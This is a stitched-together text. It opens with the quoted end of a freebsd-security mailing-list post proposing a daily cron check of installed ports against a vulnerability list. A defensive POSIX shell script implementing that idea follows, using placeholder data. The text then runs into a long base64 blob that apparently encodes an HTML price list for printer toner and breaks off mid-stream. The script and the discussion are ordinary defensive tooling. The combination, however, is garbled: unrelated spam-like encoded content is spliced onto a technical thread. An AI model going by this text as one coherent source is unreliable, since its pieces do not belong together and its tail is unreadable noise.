>vulnerable to any kind of remote/local/dos attack.
>The script can be run by the daily cron job and then checks if one of the
>installed packages is mentioned in the list of vulnerable packages.
>If so it reports package name, version, type of bug and a URL to an
>advisory as part of the cron report.
>The text file can be updated with ftp/wget/...
>
>As I've been thinking about this I just want to know if someone is
>interested in this for FreeBSD?
>
>Writing the script itself should be no problem for me but maintaining the
>vulnerability database could become difficult as the number of ports grows.
>A script that crawls through the ports cvs tree and checks for ports
>marked forbidden since the last run would be a good start but for
>unmaintained ports bugtraq/vuln-watch/... has to be read.
>Any ideas how to get more input?
>
>Which language to use?
>Perl would do fine for this job but as Perl isn't in the base system
>anymore a shell script or c program would be better if it should be
>possible to run this as part of the daily cron job.
>If I start with this, what language should I use?
>
>Thanks for all comments, Hendrik
>
>P.S.
>I won't be able to answer all questions immediately as I'm on vacation :)
>
>--
>Hendrik Scholz - - http://raisdorf.net/
>
>drag me, drop me - treat me like an object
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
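Hendrik's audit-packages design, which Jeff quotes in full above, sketched as an added POSIX sh example; this is not Hendrik's script, NetBSD's audit-packages or any FreeBSD tool. The installed-package list, the vulnerability-list line format (name<op>version, bug type, advisory URL) and the advisory URLs are constructed placeholders for the example.

```sh
#!/bin/sh
# Added example (not Hendrik's script, NetBSD's audit-packages or a FreeBSD
# tool): a cron-friendly sketch of the design he describes. A vulnerability
# list with one "name<op>version type url" entry per line (the <op> syntax is
# an assumption made here) is matched against installed packages given in
# pkg_info's "name-version" form; each hit is reported with type and URL.

# vercmp A B: compare two dotted versions component-wise as integers.
# A PORTREVISION suffix ("_1") counts as a trailing component; letters are
# dropped, so "0.9.6d" compares as "0.9.6" (a deliberate simplification).
# Prints -1, 0 or 1.
vercmp() {
    a=$(printf '%s' "$1" | tr '_,' '..' | tr -cd '0-9.')
    b=$(printf '%s' "$2" | tr '_,' '..' | tr -cd '0-9.')
    while [ -n "$a" ] || [ -n "$b" ]; do
        ca=${a%%.*}; cb=${b%%.*}                 # leading component of each
        case $a in *.*) a=${a#*.} ;; *) a= ;; esac
        case $b in *.*) b=${b#*.} ;; *) b= ;; esac
        : "${ca:=0}" "${cb:=0}"                  # missing components read as 0
        if [ "$ca" -lt "$cb" ]; then printf '%s\n' -1; return; fi
        if [ "$ca" -gt "$cb" ]; then printf '%s\n' 1; return; fi
    done
    printf '%s\n' 0
}

# split_pattern "name<op>version": sets NAME, OP and VER; fails on a bad entry.
# Two-character operators are tested first so "<=" is not read as "<".
split_pattern() {
    case $1 in
        *'<='*) NAME=${1%%<=*}; OP='<='; VER=${1#*<=} ;;
        *'>='*) NAME=${1%%>=*}; OP='>='; VER=${1#*>=} ;;
        *'<'*)  NAME=${1%%<*};  OP='<';  VER=${1#*<}  ;;
        *'>'*)  NAME=${1%%>*};  OP='>';  VER=${1#*>}  ;;
        *'='*)  NAME=${1%%=*};  OP='=';  VER=${1#*=}  ;;
        *) return 1 ;;
    esac
}

# vulnerable "name-version" "pattern": succeeds when the installed package has
# the pattern's name and its version satisfies the pattern's relation.
vulnerable() {
    split_pattern "$2" || return 1
    [ "${1%-*}" = "$NAME" ] || return 1         # name is before the last hyphen
    c=$(vercmp "${1##*-}" "$VER")                # version is after it
    case $OP in
        '<')  [ "$c" -eq -1 ] ;;
        '<=') [ "$c" -ne 1 ] ;;
        '=')  [ "$c" -eq 0 ] ;;
        '>=') [ "$c" -ne -1 ] ;;
        '>')  [ "$c" -eq 1 ] ;;
    esac
}

# audit "installed list" "vulnerability list": print one line per affected
# package, as a daily cron report would, plus a summary; exit 1 on any hit.
audit() {
    found=0
    for pkg in $1; do
        while read -r pattern type url; do
            case $pattern in ''|'#'*) continue ;; esac   # blank line or comment
            if vulnerable "$pkg" "$pattern"; then
                echo "Package $pkg has a $type vulnerability, see $url"
                found=$((found + 1))
            fi
        done <<EOF
$2
EOF
    done
    echo "$found vulnerable package(s) found"
    [ "$found" -eq 0 ]
}

# Constructed sample data (not real advisories): installed packages in
# pkg_info "name-version" form, and a vulnerability list with placeholder URLs.
INSTALLED="apache-1.3.22_1 openssl-0.9.6d mod_ssl-2.8.9 bash-2.05a"
VULN_DB='# pattern          type    advisory
apache<1.3.26       remote  http://advisory.example/apache-PLACEHOLDER
openssl<=0.9.6d     remote  http://advisory.example/openssl-PLACEHOLDER
bash<2.04           local   http://advisory.example/bash-PLACEHOLDER'

# Run the check; a non-zero status tells the cron wrapper there is something to report.
if audit "$INSTALLED" "$VULN_DB"; then
    echo "Nothing to report."
fi
```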
IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ0OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICMxM0E8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0K PC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0r MT5MYXNlcmpldCBTZXJpZXMgNTAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM0MTI5WDwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQxMjU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+Jm5ic3A7SXRlbSAjMTNCPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFz ZXJqZXQgU2VyaWVzIDEyMDAsIDMzMDANCnNlcmllczwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PkM3MTE1QTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxm b250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAw MDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICMxM0M8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5MYXNlcmpldCBTZXJpZXMgNDEwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM4MDYx WDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNv bG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ5OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+ PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICMxODwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3Rk Pg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxh 
c2VyamV0IFNlcmllcyZuYnNwOyAzMTAwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoN Cjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+MzkwNkE8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMzk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+Jm5ic3A7SXRlbSAjMTk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNl cmpldCBTZXJpZXMgNDUwMCBCbGFjazwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM0MTkxJm5i c3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDY5PC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5 Ij48Zm9udCBzaXplPSsxPiZuYnNwO0l0ZW0gIzIwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ TGFzZXJqZXQgU2VyaWVzIDQ1MDAgQ29sb3I8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5DQUxM PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDg5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4NCg0KPGNlbnRlcj48cHJlPjx1Pjxmb250IGZh Y2U9IkFyaWFsLEhlbHZldGljYSI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzM+ Rm9yIEhld2xldHQgUGFja2FuZCBDYW5ub24gRmF4IA0KPGk+KG9uIFBhZ2UgMjxiPik8L2I+PC9p PjwvZm9udD48L2ZvbnQ+PC9mb250PjwvdT48L3ByZT48L2NlbnRlcj4NCg0KPGNlbnRlcj48dGFi bGUgQk9SREVSIFdJRFRIPSI4MCUiIEhFSUdIVD0iMTAlIiBCR0NPTE9SPSIjRkZGRkNDIiA+DQo8 dHIgQUxJR049Q0VOVEVSIEJHQ09MT1I9IiM0MDgwODAiPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBj b2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5JVEVNPC9mb250PjwvZm9udD48L2NlbnRlcj4N 
CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9 KzE+REVTQ1JJUFRJT048L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNl bnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5NRkcgIzwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZG Ij48Zm9udCBzaXplPSsxPlBSSUNFPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3Ry Pg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXpl PSsxPkl0ZW0gIyAxNDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxlc2VyZmF4IDUwMCwgNzAw PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+RlgxPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ JDU5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkl0ZW0gIyAxNTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyZmF4IDUwMDAsIDcwMDA8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZv bnQgc2l6ZT0rMT5GWDI8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNl bnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNjQ8L2ZvbnQ+PC9mb250 PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjIDE2PC9mb250PjwvZm9udD48L2NlbnRl cj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+TGFzZXJmYXggNjAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkZYMzwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAw MDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 
cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICMxNzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyZmF4IDg1MDAsIDkw MDA8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBj b2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5GWDQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0K PC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0r MT4kNTQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4N CjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMTg8L2Zv bnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNlcmZheCAzMjAwPC9mb250PjwvZm9udD48L2NlbnRl cj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+MzkwNkE8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRl cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNDQ8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCjwvdHI+DQo8L3RhYmxlPjwvY2VudGVyPg0KDQo8Y2VudGVyPg0KPHA+ PHU+PGZvbnQgZmFjZT0iQXJpYWwsSGVsdmV0aWNhIj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZv bnQgc2l6ZT0rMj5Gb3INCkxleG1hcmsgLyBJQk0gTWFjaGluZXM6PGk+IChvbiBQYWdlIDMpPC9p PjwvZm9udD48L2ZvbnQ+PC9mb250PjwvdT48L2NlbnRlcj4NCg0KPGNlbnRlcj48dGFibGUgQk9S REVSIFdJRFRIPSI4MCUiIEhFSUdIVD0iMTklIiBCR0NPTE9SPSIjRkZGRkNDIiA+DQo8dHIgQkdD T0xPUj0iIzQwODA4MCI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Yj48 Zm9udCBmYWNlPSJCb29rbWFuIE9sZCBTdHlsZSI+Jm5ic3A7PC9mb250PjwvYj48Zm9udCANCnNp emU9KzE+SVRFTTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSsxPkRFU0NSSVBUSU9OPC9mb250Pjwv Zm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZG RkYiPjxmb250IHNpemU9KzE+TUZHICM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0K PHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwv 
Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRl cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMxPC9mb250PjwvZm9u dD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTki Pjxmb250IHNpemU9KzE+SUJNIDQwMTkvNDAyOSZuYnNwOzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXpl PSsxPjEzODAyMDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0K PGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kOTU8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMjwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBz aXplPSsxPk9wdHJhIFIsNDAzOSwgNDA0OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPjEzODIx NTA8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBj b2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTE3PC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5 Ij48Zm9udCBzaXplPSsxPkl0ZW0gIzM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0K PHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5PcHRyYSBF MzEwLCBFMzEyPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+ PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7MTJBMjIwMjwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAw MDk5Ij48Zm9udCBzaXplPSsxPiQ4OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICM0PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50 ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+T3B0cmEgRTwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5 
Ij48Zm9udCBzaXplPSsxPiZuYnNwOzY5RzgyNTYmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT4kNTk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjNTwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk9wdHJhIFM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0K PC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0r MT4mbmJzcDsxMzgyNjI1Jm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDEzNTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM2PC9mb250PjwvZm9udD48 L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+T3B0cmEgVDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOyAxMkE1 ODQwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDE2NTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM3PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoN Cjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+T3B0cmEg RTQxMC80MTI8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDsgNEswMDE5OCZuYnNwOzwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQxMTU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQo8L3RhYmxlPjwvY2VudGVyPg0KDQo8Y2VudGVyPg0KPHA+PHU+PGZvbnQgZmFj ZT0iQXJpYWwsSGVsdmV0aWNhIj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMj5G 
b3INCkFwcGxlIFByaW50ZXJzOjxpPiAob24gUGFnZSA4KTwvaT48L2ZvbnQ+PC9mb250PjwvZm9u dD48L3U+PC9jZW50ZXI+DQoNCjxjZW50ZXI+PHRhYmxlIEJPUkRFUiBXSURUSD0iODAlIiBIRUlH SFQ9IjEwJSIgQkdDT0xPUj0iI0ZGRkZDQyIgPg0KPHRyIEFMSUdOPUxFRlQgQkdDT0xPUj0iIzQw ODA4MCI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSsx PklURU08L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9u dCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5ERVNDUklQVElPTjwvZm9udD48L2ZvbnQ+ PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48 Zm9udCBzaXplPSsxPk1GRyM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0K PGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9u dCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtJm5ic3A7ICMxPC9mb250PjwvZm9u dD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTki Pjxmb250IHNpemU9KzE+UGVyc29uYWwgTGFzZXJXcml0ZXI8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5NMDA4OUxMQTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1NDwvZm9udD48L2ZvbnQ+ PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMyPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 